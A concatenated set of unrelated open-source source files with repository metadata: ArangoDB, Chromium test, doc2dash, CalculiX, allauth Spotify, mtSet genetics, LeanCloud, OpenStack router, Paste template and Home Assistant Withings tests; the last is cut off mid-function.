"repo_name": "nputikhin/simple-ant-hrm",
"id": "a17868cfc96d691fea21d2fc6d5c72a45d73e5bf",
"size": "496",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SimpleHRMClient/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10884"
}
],
"symlink_target": ""
} |
import sys
from pyArango.connection import *
from pyArango.graph import *
from pyArango.collection import *
class Social(object):
class male(Collection):
_fields = {
"name" : Field()
}
class female(Collection):
_fields = {
"name" : Field()
}
class relation(Edges):
_fields = {
"number" : Field()
}
class social(Graph):
_edgeDefinitions = (EdgeDefinition ('relation',
fromCollections = ["female", "male"],
toCollections = ["female", "male"]),)
_orphanedCollections = []
def __init__(self):
self.conn = Connection(username="USERNAME", password="SECRET")
self.db = self.conn["_system"]
if self.db.hasGraph('social'):
raise Exception("The social graph was already provisioned! remove it first")
self.female = self.db.createCollection('Collection', "female")
self.male = self.db.createCollection('Collection', "male")
self.relation = self.db.createCollection('Edges', "relation")
g = self.db.createGraph("social")
a = g.createVertex('female', {"name": 'Alice', "_key": 'alice'});
b = g.createVertex('male', {"name": 'Bob', "_key": 'bob'});
c = g.createVertex('male', {"name": 'Charly', "_key": 'charly'});
d = g.createVertex('female', {"name": 'Diana', "_key": 'diana'});
a.save()
b.save()
c.save()
d.save()
g.link('relation', a, b, {"type": 'married', "_key": 'aliceAndBob'})
g.link('relation', a, c, {"type": 'friend', "_key": 'aliceAndCharly'})
g.link('relation', c, d, {"type": 'married', "_key": 'charlyAndDiana'})
g.link('relation', b, d, {"type": 'friend', "_key": 'bobAndDiana'})
Social()
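# A follow-up sketch (hypothetical; binds the instance instead of the bare
# Social() call above): traverse the 'relation' edges with AQL to list
# everyone directly linked to Alice.
#
#   s = Social()
#   aql = "FOR v IN 1..1 ANY 'female/alice' relation RETURN v.name"
#   print(list(s.db.AQLQuery(aql, rawResults=True)))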
| {
"content_hash": "65b8686e93555343a727bb111887ece3",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 95,
"avg_line_length": 36.583333333333336,
"alnum_prop": 0.45011389521640094,
"repo_name": "tariqdaouda/pyArango",
"id": "739a863a14040ce4875bcc7b395ed323b1e14af7",
"size": "2213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/createSocialGraph.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6714"
},
{
"name": "Makefile",
"bytes": "6779"
},
{
"name": "Python",
"bytes": "139623"
},
{
"name": "Shell",
"bytes": "492"
}
],
"symlink_target": ""
} |
import logging
import pyauto_functional # must come before pyauto.
import policy_base
import pyauto
from policy_test_cases import PolicyPrefsTestCases
class PolicyPrefsUITest(policy_base.PolicyTestBase):
"""Tests user policies and their impact on the prefs UI."""
settings_pages = [
'chrome://settings-frame',
'chrome://settings-frame/searchEngines',
'chrome://settings-frame/passwords',
'chrome://settings-frame/autofill',
'chrome://settings-frame/content',
'chrome://settings-frame/homePageOverlay',
'chrome://settings-frame/languages',
]
if pyauto.PyUITest.IsChromeOS():
settings_pages += [
'chrome://settings-frame/accounts',
]
def setUp(self):
policy_base.PolicyTestBase.setUp(self)
if self.IsChromeOS():
self.LoginWithTestAccount()
def IsAnyBannerVisible(self):
"""Returns true if any banner (e.g. for managed prefs) is visible."""
ret = self.ExecuteJavascript("""
var visible = false;
var banners = document.querySelectorAll('.page-banner');
for (var i=0; i<banners.length; i++) {
if (banners[i].parentElement.id == 'templates')
continue;
if (window.getComputedStyle(banners[i]).display != 'none')
visible = true;
}
domAutomationController.send(visible.toString());
""")
return ret == 'true'
def testNoUserPoliciesNoBanner(self):
"""Verifies the banner isn't present when no user policies are in place."""
self.SetUserPolicy({})
for page in PolicyPrefsUITest.settings_pages:
self.NavigateToURL(page)
self.assertFalse(self.IsAnyBannerVisible(), msg=
'Unexpected banner in %s.\n'
'Please check that chrome/test/functional/policy_prefs_ui.py has an '
'entry for any new policies introduced.' % page)
def RunUserPoliciesShowBanner(self, include_expected, include_unexpected):
"""Tests all the user policies on each settings page.
If |include_expected|, pages where the banner is expected will be verified.
If |include_unexpected|, pages where the banner should not appear will also
be verified. This can take some time.
"""
os = self.GetPlatform()
all_policies = self.GetPolicyDefinitionList()
for policy, policy_test in PolicyPrefsTestCases.policies.iteritems():
# Skip device policies
if policy in all_policies and all_policies[policy][1]:
continue
if os not in policy_test[PolicyPrefsTestCases.INDEX_OS]:
continue
expected_pages = [PolicyPrefsUITest.settings_pages[n]
for n in policy_test[PolicyPrefsTestCases.INDEX_PAGES]]
did_test = False
for page in PolicyPrefsUITest.settings_pages:
expected = page in expected_pages
if expected and not include_expected:
continue
if not expected and not include_unexpected:
continue
if not did_test:
did_test = True
policy_dict = {
policy: policy_test[PolicyPrefsTestCases.INDEX_VALUE]
}
self.SetUserPolicy(policy_dict)
self.NavigateToURL(page)
self.assertEqual(expected, self.IsAnyBannerVisible(), msg=
'Banner was%sexpected in %s, but it was%svisible.\n'
'The policy tested was "%s".\n'
'Please check that chrome/test/functional/policy_prefs_ui.py has '
'an entry for any new policies introduced.' %
(expected and ' ' or ' NOT ', page, expected and ' NOT ' or ' ',
policy))
if did_test:
logging.debug('Policy passed: %s' % policy)
def testUserPoliciesShowBanner(self):
"""Verifies the banner is shown when a user pref is managed by policy."""
self.RunUserPoliciesShowBanner(True, False)
# This test is disabled by default because it takes a very long time,
# for little benefit.
def UserPoliciesDontShowBanner(self):
"""Verifies that the banner is NOT shown on unrelated pages."""
self.RunUserPoliciesShowBanner(False, True)
def testFailOnUserPoliciesNotTested(self):
"""Verifies that all existing user policies are covered.
Fails for all user policies listed in GetPolicyDefinitionList() that aren't
listed in |PolicyPrefsUITest.policies|, and thus are not tested by
|testUserPoliciesShowBanner|.
"""
all_policies = self.GetPolicyDefinitionList()
for policy in all_policies:
# Skip device policies
if all_policies[policy][1]:
continue
self.assertTrue(policy in PolicyPrefsTestCases.policies, msg=
'Policy "%s" does not have a test in '
'chrome/test/functional/policy_prefs_ui.py.\n'
'Please edit the file and add an entry for this policy.' % policy)
test_type = type(PolicyPrefsTestCases.policies[policy]
[PolicyPrefsTestCases.INDEX_VALUE]).__name__
expected_type = all_policies[policy][0]
self.assertEqual(expected_type, test_type, msg=
'Policy "%s" has type "%s" but the test value has type "%s".' %
(policy, expected_type, test_type))
def testToggleUserPolicyTogglesBanner(self):
"""Verifies that toggling a user policy toggles the banner's visibility."""
# |policy| just has to be any user policy that has at least a settings page
# that displays the banner when the policy is set.
policy = 'ShowHomeButton'
policy_test = PolicyPrefsTestCases.policies[policy]
page = PolicyPrefsUITest.settings_pages[
policy_test[PolicyPrefsTestCases.INDEX_PAGES][0]]
policy_dict = {
policy: policy_test[PolicyPrefsTestCases.INDEX_VALUE]
}
self.SetUserPolicy({})
self.NavigateToURL(page)
self.assertFalse(self.IsAnyBannerVisible())
self.SetUserPolicy(policy_dict)
self.assertTrue(self.IsAnyBannerVisible())
self.SetUserPolicy({})
self.assertFalse(self.IsAnyBannerVisible())
if __name__ == '__main__':
pyauto_functional.Main()
| {
"content_hash": "5985a27d69ae7c94e65d5e9c19a9a9a6",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 80,
"avg_line_length": 37.525,
"alnum_prop": 0.6655562958027982,
"repo_name": "keishi/chromium",
"id": "12c126a076edf257c74c33edfc2385ca7e909c79",
"size": "6807",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "chrome/test/functional/policy_prefs_ui.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "1172794"
},
{
"name": "C",
"bytes": "67452317"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "132681259"
},
{
"name": "F#",
"bytes": "381"
},
{
"name": "Go",
"bytes": "19048"
},
{
"name": "Java",
"bytes": "361412"
},
{
"name": "JavaScript",
"bytes": "16603687"
},
{
"name": "Objective-C",
"bytes": "9609581"
},
{
"name": "PHP",
"bytes": "97796"
},
{
"name": "Perl",
"bytes": "918683"
},
{
"name": "Python",
"bytes": "6407891"
},
{
"name": "R",
"bytes": "524"
},
{
"name": "Shell",
"bytes": "4192593"
},
{
"name": "Tcl",
"bytes": "277077"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import logging
from doc2dash.parsers.types import Parser
from .docsets import DocSet
from .parsers.patcher import patch_anchors
log = logging.getLogger(__name__)
def convert_docs(
*,
parser: Parser,
docset: DocSet,
quiet: bool,
) -> None:
"""
    Use *parser* to parse, index, and patch *docset*.
"""
log.info("Parsing documentation...")
with docset.db_conn:
toc = patch_anchors(parser, docset.docs, show_progressbar=not quiet)
next(toc)
for entry in parser.parse():
docset.db_conn.execute(
"INSERT INTO searchIndex VALUES (NULL, ?, ?, ?)",
entry.as_tuple(),
)
toc.send(entry)
count = docset.db_conn.execute(
"SELECT COUNT(1) FROM searchIndex"
).fetchone()[0]
color = "green" if count > 0 else "red"
log.info(f"Added [{color}]{count:,}[/{color}] index entries.")
# Now patch for TOCs.
toc.close()
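# A usage sketch (assumed wiring; in doc2dash the CLI layer builds these
# objects): `parser` must implement Parser.parse() yielding index entries, and
# `docset` must expose `db_conn` (a sqlite3 connection with a searchIndex
# table) and `docs` (the path to the HTML documentation).
#
#   convert_docs(parser=parser, docset=docset, quiet=False)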
| {
"content_hash": "04319342e78adf84f859686741746de8",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 76,
"avg_line_length": 23.53488372093023,
"alnum_prop": 0.5849802371541502,
"repo_name": "hynek/doc2dash",
"id": "cd577231141afa1308f224c66d7180efaf7df7ef",
"size": "1012",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/doc2dash/convert.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "38597"
},
{
"name": "Python",
"bytes": "69808"
},
{
"name": "Starlark",
"bytes": "2048"
}
],
"symlink_target": ""
} |
import os
import multiprocessing
import shutil
# Provide access to the helper scripts
def modify_path():
scripts_dir = os.path.dirname(__file__)
    while 'Scripts' not in os.listdir(scripts_dir):
scripts_dir = os.path.abspath(os.path.join(scripts_dir, '..'))
scripts_dir = os.path.join(scripts_dir, 'Scripts')
    if scripts_dir not in os.environ['PATH']:
os.environ['PATH'] += os.pathsep + scripts_dir
print '\nPATH = {}\n'.format(os.environ['PATH'])
# Move new files and folders to 'Refs'
def move(old_snap):
new_snap = os.listdir(os.curdir)
if not os.path.exists('Refs'):
os.mkdir('Refs')
for f in new_snap:
        if f not in old_snap:
fname = os.path.basename(f)
new_name = os.path.join(os.curdir, 'Refs', fname)
if os.path.isfile(new_name):
os.remove(new_name)
if os.path.isdir(new_name):
shutil.rmtree(new_name)
os.rename(f, new_name)
if __name__ == '__main__':
# Enable multithreading for ccx
os.environ['OMP_NUM_THREADS'] = str(multiprocessing.cpu_count())
# Explicitly move to example's directory
os.chdir(os.path.dirname(__file__))
# Run the example
modify_path()
snap = os.listdir(os.curdir)
os.system("cgx -b pre.fbd")
os.system("ccx plates")
os.system("cgx -b post.fbd")
move(snap)
| {
"content_hash": "e0d7622c23613d714b5fd41b5f7c8880",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 70,
"avg_line_length": 29.595744680851062,
"alnum_prop": 0.6024442846872753,
"repo_name": "mkraska/CalculiX-Examples",
"id": "ce6ca7e981fc7381479b54bd9a719a1c9aed2b67",
"size": "1409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Linear/Plates/test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6479"
},
{
"name": "GLSL",
"bytes": "3414"
},
{
"name": "Gnuplot",
"bytes": "10112"
},
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "NASL",
"bytes": "1378"
},
{
"name": "Python",
"bytes": "115410"
}
],
"symlink_target": ""
} |
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import SpotifyOAuth2Provider
class SpotifyOAuth2Adapter(OAuth2Adapter):
provider_id = SpotifyOAuth2Provider.id
access_token_url = "https://accounts.spotify.com/api/token"
authorize_url = "https://accounts.spotify.com/authorize"
profile_url = "https://api.spotify.com/v1/me"
def complete_login(self, request, app, token, **kwargs):
extra_data = requests.get(
self.profile_url, params={"access_token": token.token}
)
return self.get_provider().sociallogin_from_response(request, extra_data.json())
oauth_login = OAuth2LoginView.adapter_view(SpotifyOAuth2Adapter)
oauth_callback = OAuth2CallbackView.adapter_view(SpotifyOAuth2Adapter)
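# A minimal sketch of enabling this provider in a Django project's settings;
# the surrounding settings module is assumed, not part of this file:
#   INSTALLED_APPS = [
#       # ...
#       "allauth",
#       "allauth.socialaccount",
#       "allauth.socialaccount.providers.spotify",
#   ]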
| {
"content_hash": "442bab42eebcaac1d034a7e7f1207169",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 88,
"avg_line_length": 31.555555555555557,
"alnum_prop": 0.7335680751173709,
"repo_name": "rsalmaso/django-allauth",
"id": "83fe5a1b96d72d94927e762b178cdb10f87d74b2",
"size": "852",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "allauth/socialaccount/providers/spotify/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Emacs Lisp",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "20404"
},
{
"name": "JavaScript",
"bytes": "3360"
},
{
"name": "Makefile",
"bytes": "396"
},
{
"name": "Python",
"bytes": "923713"
}
],
"symlink_target": ""
} |
import sys
sys.path.append('./..')
import mtSet.pycore.modules.splitter as SPLIT
import mtSet.pycore.modules.multiTraitSetTest as MTST
import mtSet.pycore.modules.chi2mixture as C2M
from mtSet.pycore.utils.utils import smartAppend
from mtSet.pycore.utils.utils import smartDumpDictHdf5
import scipy as SP
import h5py
import pylab as PL
import copy
import os
import cPickle
import time as TIME
import urllib
# data and cache files
files = {}
files['data_dir'] = 'data'
files['data'] = 'data/arab107_preprocessed.hdf5'
files['data_url'] = 'http://www.ebi.ac.uk/~casale/arab107_preprocessed.hdf5'
files['out_file'] = 'data/results.hdf5'
files['split_cache'] = 'windows_split.hdf5'
files['mtSet_null_cache'] = 'mtSet_null_cache.hdf5'
files['stSet_null_cache'] = 'stSet_null_cache.hdf5'
files['mtSetPC_null_cache'] = 'mtSetPC_null_cache.hdf5'
# settings for splitting the genome in different regions and permutations
settings = {}
settings['window_size'] = 1e4
settings['minNumberSnps'] = 4 # considers only windows with at least 4 SNPs
settings['n_windows'] = 10
settings['n_permutations'] = 10
def download_data():
if not os.path.exists(files['data']):
if not os.path.exists(files['data_dir']):
os.makedirs(files['data_dir'])
print "file not found, downloading from %s" % files['data_url']
        testfile = urllib.URLopener()
        testfile.retrieve(files['data_url'], files['data'])
if __name__ == "__main__":
# N = number of samples
# P = number of phenotypes
# V = number of variants
# K = number of covariates
download_data()
# import data
f = h5py.File(files['data'],'r')
phenotype = f['phenotype'][:] # phenotype matrix (NxP)
phenotypeID = f['phenotypeID'][:] # phenotype ids (P-vector)
genotype = f['genotype'] # genotype matrix (NxV)
relatedness = f['relatedness'][:] # relatedness matrix (NxN)
geno_pos = f['geno_pos'][:] # genotype positions (V-vector)
geno_chrom = f['geno_chrom'][:] # genotype choromosomes (V-vector)
covariates = f['covariates'][:] # covariate matrix (NxK)
# here we consider no covariates for mtSet and stSet
# while we consider 6 covariates for mtSetPC
# (intercept term and first 5 pcs of the relatedness matrix)
# multi trait set test class
mtSet = MTST.MultiTraitSetTest(phenotype,relatedness)
mtSetPC = MTST.MultiTraitSetTest(phenotype,F=covariates)
print '.. fit null models'
mtSet_null_info = mtSet.fitNull(cache=True,fname=files['mtSet_null_cache'],rewrite=True)
stSet_null_info = mtSet.fitNullTraitByTrait(cache=True,fname=files['stSet_null_cache'],rewrite=True)
    mtSetPC_null_info = mtSetPC.fitNull(cache=True,fname=files['mtSetPC_null_cache'],rewrite=True)
print '.. precompute genotype windows'
split = SPLIT.Splitter(pos=geno_pos,chrom=geno_chrom)
split.splitGeno(size=settings['window_size'],minSnps=settings['minNumberSnps'],cache=True,fname=files['split_cache'])
nWindows = split.get_nWindows()
RV = {}
print '.. set test scan'
for window_idx in range(settings['n_windows']):
print '\t.. window %d'%window_idx
# consider genetic region
Iregion, rv_windows = split.getWindow(window_idx)
region = genotype[:,Iregion]
# fit models
rv_mtSet = mtSet.optimize(region)
rv_stSet = mtSet.optimizeTraitByTrait(region)
rv_mtSetPC = mtSetPC.optimize(region)
# store LLR (log likelihood ratios) and window positions
smartAppend(RV,'window_chromosome',rv_windows['chrom'][0])
smartAppend(RV,'window_start',rv_windows['start'][0])
smartAppend(RV,'window_end',rv_windows['end'][0])
smartAppend(RV,'llr_mtSet',rv_mtSet['LLR'][0])
smartAppend(RV,'llr_stSet',SP.concatenate([rv_stSet[key]['LLR'] for key in rv_stSet.keys()]))
smartAppend(RV,'llr_mtSetPC',rv_mtSetPC['LLR'][0])
# consider permutations
for permutation_i in range(settings['n_permutations']):
print '.. permutation %d' % permutation_i
# set seed and generate sample permutation
SP.random.seed(permutation_i)
permutation = SP.random.permutation(phenotype.shape[0])
for window_idx in range(settings['n_windows']):
print '\t.. window %d'%window_idx
# consider genetic region and permute
Iregion, rv_windows = split.getWindow(window_idx)
region = genotype[:,Iregion]
permuted_region = region[permutation,:]
# fit models
rv_mtSet = mtSet.optimize(permuted_region)
rv_stSet = mtSet.optimizeTraitByTrait(permuted_region)
rv_mtSetPC = mtSetPC.optimize(permuted_region)
# store permutation LLRs
smartAppend(RV,'permutation_llr_mtSet',rv_mtSet['LLR'][0])
smartAppend(RV,'permutation_llr_stSet',SP.concatenate([rv_stSet[key]['LLR'] for key in rv_stSet.keys()]))
smartAppend(RV,'permutation_llr_mtSetPC',rv_mtSetPC['LLR'][0])
# vectorize outputs
for key in RV.keys(): RV[key] = SP.array(RV[key])
print '.. calculate p-values'
    print '(for an accurate estimate of p-values, increase the number of windows or the number of permutations)'
c2m = C2M.Chi2mixture(tol=4e-3)
# obtain p-values for mtSet
c2m.estimate_chi2mixture(RV['permutation_llr_mtSet'])
RV['pv_mtSet'] = c2m.sf(RV['llr_mtSet'])
RV['permutation_pv_mtSet'] = c2m.sf(RV['permutation_llr_mtSet'])
# obtain p-values for stSet
RV['pv_stSet'] = SP.zeros_like(RV['llr_stSet'])
RV['permutation_pv_stSet'] = SP.zeros_like(RV['permutation_llr_stSet'])
for p in range(phenotype.shape[1]):
c2m.estimate_chi2mixture(RV['permutation_llr_stSet'][:,p])
RV['pv_stSet'][:,p] = c2m.sf(RV['llr_stSet'][:,p])
RV['permutation_pv_stSet'][:,p] = c2m.sf(RV['permutation_llr_stSet'][:,p])
# obtain p-values for mtSetPC
c2m.estimate_chi2mixture(RV['permutation_llr_mtSetPC'])
RV['pv_mtSetPC'] = c2m.sf(RV['llr_mtSetPC'])
RV['permutation_pv_mtSetPC'] = c2m.sf(RV['permutation_llr_mtSetPC'])
print '.. export results in %s'%files['out_file']
fout = h5py.File(files['out_file'],'w')
smartDumpDictHdf5(RV,fout)
fout.close()
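    # Conceptual sketch, independent of mtSet: the plain empirical permutation
    # p-value that the chi2-mixture fit above approximates more efficiently;
    # the function name and arguments are illustrative only.
    def empirical_pvalue(observed_llr, permutation_llrs):
        permutation_llrs = SP.asarray(permutation_llrs)
        # the +1 correction avoids p-values of exactly zero
        return (1.0 + (permutation_llrs >= observed_llr).sum()) / (1.0 + permutation_llrs.size)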
| {
"content_hash": "59125a7628105c63dac56d3c5f5615bb",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 125,
"avg_line_length": 37.946107784431135,
"alnum_prop": 0.6585134921887328,
"repo_name": "PMBio/mtSet",
"id": "bf2f5676a83935ece03dc60fc22e7426ef14c3a4",
"size": "6963",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notebooks/arab_demo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "208765"
},
{
"name": "Shell",
"bytes": "2412"
}
],
"symlink_target": ""
} |
from leancloud import Object
from leancloud import Query
from leancloud import LeanCloudError
from flask import Blueprint
from flask import request
from flask import redirect
from flask import url_for
from flask import render_template
class Todo(Object):
pass
todos_view = Blueprint('todos', __name__)
@todos_view.route('')
def show():
try:
todos = Query(Todo).descending('createdAt').find()
except LeanCloudError as e:
if e.code == 101: # Class does not exist on the cloud.
todos = []
else:
raise e
return render_template('todos.html', todos=todos)
@todos_view.route('', methods=['POST'])
def add():
content = request.form['content']
todo = Todo(content=content)
try:
todo.save()
except LeanCloudError as e:
return e.error, 502
return redirect(url_for('todos.show'))
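# A minimal sketch of wiring this blueprint into an application; the URL
# prefix is an assumption, not taken from this repository.
def create_app():
    from flask import Flask
    app = Flask(__name__)
    app.register_blueprint(todos_view, url_prefix='/todos')
    return app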
| {
"content_hash": "e233fad3221a26c3034a4834b12be1fb",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 64,
"avg_line_length": 23.7027027027027,
"alnum_prop": 0.6590649942987458,
"repo_name": "leancloud/python-getting-started",
"id": "d68cce2149be2990137144462757b902374ce9fb",
"size": "894",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "views/todos.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "110"
},
{
"name": "HTML",
"bytes": "1164"
},
{
"name": "Python",
"bytes": "5826"
}
],
"symlink_target": ""
} |
from openstack import resource
from openstack import utils
class Router(resource.Resource, resource.TagMixin):
resource_key = 'router'
resources_key = 'routers'
base_path = '/routers'
# capabilities
allow_create = True
allow_fetch = True
allow_commit = True
allow_delete = True
allow_list = True
# NOTE: We don't support query on datetime, list or dict fields
_query_mapping = resource.QueryParameters(
'description', 'flavor_id', 'name', 'status',
is_admin_state_up='admin_state_up',
is_distributed='distributed',
is_ha='ha',
project_id='tenant_id',
**resource.TagMixin._tag_query_parameters
)
# Properties
#: Availability zone hints to use when scheduling the router.
#: *Type: list of availability zone names*
availability_zone_hints = resource.Body('availability_zone_hints',
type=list)
#: Availability zones for the router.
#: *Type: list of availability zone names*
availability_zones = resource.Body('availability_zones', type=list)
#: Timestamp when the router was created.
created_at = resource.Body('created_at')
#: The router description.
description = resource.Body('description')
#: The ``network_id``, for the external gateway. *Type: dict*
external_gateway_info = resource.Body('external_gateway_info', type=dict)
#: The ID of the flavor.
flavor_id = resource.Body('flavor_id')
#: The administrative state of the router, which is up ``True``
#: or down ``False``. *Type: bool*
is_admin_state_up = resource.Body('admin_state_up', type=bool)
#: The distributed state of the router, which is distributed ``True``
#: or not ``False``. *Type: bool*
is_distributed = resource.Body('distributed', type=bool)
#: The highly-available state of the router, which is highly available
#: ``True`` or not ``False``. *Type: bool*
is_ha = resource.Body('ha', type=bool)
#: The router name.
name = resource.Body('name')
#: The ID of the project this router is associated with.
project_id = resource.Body('tenant_id')
#: Revision number of the router. *Type: int*
revision_number = resource.Body('revision', type=int)
#: The extra routes configuration for the router.
routes = resource.Body('routes', type=list)
#: The router status.
status = resource.Body('status')
#: Timestamp when the router was created.
updated_at = resource.Body('updated_at')
def add_interface(self, session, **body):
"""Add an internal interface to a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id, 'add_router_interface')
resp = session.put(url, json=body)
return resp.json()
def remove_interface(self, session, **body):
"""Remove an internal interface from a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id, 'remove_router_interface')
resp = session.put(url, json=body)
return resp.json()
def add_gateway(self, session, **body):
"""Add an external gateway to a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id,
'add_gateway_router')
resp = session.put(url, json=body)
return resp.json()
def remove_gateway(self, session, **body):
"""Remove an external gateway from a logical router.
:param session: The session to communicate through.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param dict body: The body requested to be updated on the router
:returns: The body of the response as a dictionary.
"""
url = utils.urljoin(self.base_path, self.id,
'remove_gateway_router')
resp = session.put(url, json=body)
return resp.json()
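# Illustrative sketch (not part of the SDK): exercising the helpers above
# from application code; ``conn`` is an assumed
# openstack.connection.Connection and the IDs are made up.
#   router = conn.network.find_router('my-router')
#   conn.network.add_interface_to_router(router, subnet_id='<subnet-uuid>')
#   conn.network.remove_interface_from_router(router, subnet_id='<subnet-uuid>')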
class L3AgentRouter(Router):
resource_key = 'router'
resources_key = 'routers'
base_path = '/agents/%(agent_id)s/l3-routers'
resource_name = 'l3-router'
# capabilities
allow_create = False
allow_retrieve = True
allow_commit = False
allow_delete = False
allow_list = True
# NOTE: No query parameter is supported
| {
"content_hash": "559e4c88eac312f8293e9ba8f1ce104b",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 79,
"avg_line_length": 37.932330827067666,
"alnum_prop": 0.6402378592666006,
"repo_name": "dtroyer/python-openstacksdk",
"id": "afe0f104b8c7e2f6cd54fcc4bdb78c3a6d4bdf80",
"size": "5591",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstack/network/v2/router.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3803161"
},
{
"name": "Shell",
"bytes": "9027"
}
],
"symlink_target": ""
} |
from paste.script import templates
class OortAppTemplate(templates.Template):
summary = "A clean Oort web app package"
_template_dir = 'paste_templates/oort_app'
required_templates = ['basic_package']
use_cheetah = False
| {
"content_hash": "225048b4b6b8185b7d271d1801cf4360",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 46,
"avg_line_length": 29.875,
"alnum_prop": 0.7238493723849372,
"repo_name": "tectronics/oort.python-oortpub",
"id": "4f9775f2989525d83fc59babb2678200fe5a70ba",
"size": "239",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "oort/util/paste_templates.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "965"
},
{
"name": "Python",
"bytes": "30204"
}
],
"symlink_target": ""
} |
"""Tests for the Withings component."""
import datetime
import re
from typing import Any
from unittest.mock import MagicMock
from urllib.parse import urlparse
from aiohttp.test_utils import TestClient
import pytest
import requests_mock
from withings_api.common import NotifyAppli, NotifyListProfile, NotifyListResponse
from homeassistant.components.withings.common import (
ConfigEntryWithingsApi,
DataManager,
WebhookConfig,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_entry_oauth2_flow import AbstractOAuth2Implementation
from tests.common import MockConfigEntry
from tests.components.withings.common import (
ComponentFactory,
get_data_manager_by_user_id,
new_profile_config,
)
from tests.test_util.aiohttp import AiohttpClientMocker
async def test_config_entry_withings_api(hass: HomeAssistant) -> None:
"""Test ConfigEntryWithingsApi."""
config_entry = MockConfigEntry(
data={"token": {"access_token": "mock_access_token", "expires_at": 1111111}}
)
config_entry.add_to_hass(hass)
implementation_mock = MagicMock(spec=AbstractOAuth2Implementation)
implementation_mock.async_refresh_token.return_value = {
"expires_at": 1111111,
"access_token": "mock_access_token",
}
with requests_mock.mock() as rqmck:
rqmck.get(
re.compile(".*"),
status_code=200,
json={"status": 0, "body": {"message": "success"}},
)
api = ConfigEntryWithingsApi(hass, config_entry, implementation_mock)
response = await hass.async_add_executor_job(
api.request, "test", {"arg1": "val1", "arg2": "val2"}
)
assert response == {"message": "success"}
@pytest.mark.parametrize(
["user_id", "arg_user_id", "arg_appli", "expected_code"],
[
[0, 0, NotifyAppli.WEIGHT.value, 0], # Success
[0, None, 1, 0], # Success, we ignore the user_id.
[0, None, None, 12], # No request body.
[0, "GG", None, 20], # appli not provided.
[0, 0, None, 20], # appli not provided.
[0, 0, 99, 21], # Invalid appli.
[0, 11, NotifyAppli.WEIGHT.value, 0], # Success, we ignore the user_id
],
)
async def test_webhook_post(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
user_id: int,
arg_user_id: Any,
arg_appli: Any,
expected_code: int,
) -> None:
"""Test webhook callback."""
person0 = new_profile_config("person0", user_id)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, user_id)
client: TestClient = await aiohttp_client(hass.http.app)
post_data = {}
if arg_user_id is not None:
post_data["userid"] = arg_user_id
if arg_appli is not None:
post_data["appli"] = arg_appli
resp = await client.post(
urlparse(data_manager.webhook_config.url).path, data=post_data
)
# Wait for remaining tasks to complete.
await hass.async_block_till_done()
data = await resp.json()
resp.close()
assert data["code"] == expected_code
async def test_webhook_head(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
) -> None:
"""Test head method on webhook view."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, person0.user_id)
client: TestClient = await aiohttp_client(hass.http.app)
resp = await client.head(urlparse(data_manager.webhook_config.url).path)
assert resp.status == 200
async def test_webhook_put(
hass: HomeAssistant,
component_factory: ComponentFactory,
aiohttp_client,
) -> None:
"""Test webhook callback."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
await component_factory.setup_profile(person0.user_id)
data_manager = get_data_manager_by_user_id(hass, person0.user_id)
